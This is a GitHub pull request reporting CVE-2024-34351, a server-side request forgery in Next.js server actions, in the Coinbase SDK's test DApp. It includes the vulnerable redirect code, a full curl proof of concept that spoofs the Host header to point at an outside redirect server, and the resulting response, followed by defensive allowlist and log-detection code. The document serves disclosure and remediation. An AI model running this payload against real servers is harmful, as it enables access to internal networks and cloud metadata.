
fix(deps): Server-Side Request Forgery in Next Actions DApp #1449

Closed

Conversation


@lamcodeofpwnosec lamcodeofpwnosec commented Nov 10, 2024

Summary

The server has a vulnerable redirect action. A Server-Side Request Forgery (SSRF) vulnerability was identified in the Next.js Coinbase SDK Server Actions. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. An attacker is able to read the full HTTP response when successfully exploiting this SSRF issue.

```ts
'use server'

import { redirect } from 'next/navigation'

// Server action that answers with a relative redirect; the affected Next.js
// versions resolve that relative target against the request's Host header.
export async function create() {
  console.log('Server Side')
  return redirect('/?voorivex')
}
```

The attacker needs to prepare a redirect server for sniffing; one is prepared for this PoC.

```bash
curl 'http://localhost:3000/' \
  -H 'Host: nextjs-cve-2024-34351.deno.dev' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://localhost:3005/connect' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://localhost:3005/connect' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw '[]'
```

The response body returned by the server:

```html
<!doctype html>
<html>
<head>
    <title>Coinbase SDK</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;

    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #38488f;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }
    </style>
</head>

<body>
<div>
    <h1>Example Domain</h1>
    <p>This domain is for use in illustrative examples in documents. You may use this
    domain in literature without prior coordination or asking for permission.</p>
    <p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>
```

Impact

An attacker can make arbitrary requests to URLs and read the full HTTP response made through these requests. As the requests originate from the server, an attacker could leverage this bug to access the internal network or metadata IPs for privilege escalation. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next application server itself.
CWE-918
CVE-2024-34351

Solution

Upgrade Next to 14.1.1.
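As an added illustration (not code from this PR or from the Coinbase SDK), the following shows the defensive side of the issue described above: a resolver that builds the absolute redirect URL from the client-supplied Host header, beside one that only accepts a configured host allowlist, plus a small check over constructed request-log lines that flags server-action invocations carrying an unexpected Host. The function names, the allowlist entries and the log layout are all assumptions made for the example.

```javascript
// Constructed allowlist of hosts this deployment legitimately serves.
const ALLOWED_HOSTS = new Set(['localhost:3000', 'app.example.test']);

// Vulnerable pattern: the absolute URL for a relative redirect is built from
// whatever Host the client sent, so a spoofed Host steers where the server
// itself fetches from (the behaviour the PR description reports).
function resolveRedirectUnsafe(hostHeader, location) {
  return new URL(location, `http://${hostHeader}`).toString();
}

// Hardened pattern: refuse unless Host is on the allowlist, and refuse any
// resolved target that leaves that host. Returns null so the caller can
// answer 400 instead of following the redirect.
function resolveRedirectSafe(hostHeader, location) {
  const host = (hostHeader || '').trim().toLowerCase();
  if (!ALLOWED_HOSTS.has(host)) return null;
  const url = new URL(location, `http://${host}`);
  if (url.host !== host) return null; // absolute URL pointing elsewhere
  return url.toString();
}

// Detection helper: a server-action request (non-empty Next-Action header)
// whose Host is not ours is worth alerting on, whatever the action did.
function flagSuspiciousActionRequests(logLines) {
  return logLines.filter((line) => {
    const m = line.match(/host="([^"]+)".*next-action="([^"]*)"/i);
    return m !== null && m[2] !== '' && !ALLOWED_HOSTS.has(m[1].toLowerCase());
  });
}

// Constructed sample log lines in a hypothetical key="value" layout
// (not the real Next.js log format; "deadbeef" is a placeholder action id).
const SAMPLE_LOGS = [
  'method=POST path=/ host="localhost:3000" next-action="deadbeef"',
  'method=POST path=/ host="evil.example" next-action="deadbeef"',
  'method=GET path=/ host="evil.example" next-action=""',
];

console.log(resolveRedirectUnsafe('evil.example', '/?voorivex'));
console.log(resolveRedirectSafe('evil.example', '/?voorivex'));
console.log(flagSuspiciousActionRequests(SAMPLE_LOGS));
```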

@cb-heimdall (Collaborator) commented Nov 10, 2024

🟡 Heimdall Review Status

| Requirement | Status |
| --- | --- |
| Reviews | 🟡 0/1 |

@cb-jake (Contributor) commented Nov 12, 2024

Thanks for flagging. Next is just for testing the SDK. Will look into upgrading in a future PR.

@lamcodeofpwnosec (Author) commented

Hi @cb-jake, thanks for your response. Let's merge this pull request to fix that.

@cb-jake (Contributor) commented Nov 12, 2024

Thanks. Going to close. We have an existing PR to update Next here: #1429

@cb-jake cb-jake closed this Nov 12, 2024